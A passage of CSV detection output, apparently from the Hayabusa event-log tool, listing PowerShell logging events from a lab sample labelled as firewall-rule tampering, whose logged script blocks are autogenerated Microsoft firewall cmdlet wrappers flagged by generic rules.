rule activation.evtx +2021-04-23 19:09:45.111 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.112 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.112 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module 
$script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] 
${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 
[Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { 
[CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.144 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.145 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.177 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { 
throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.177 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
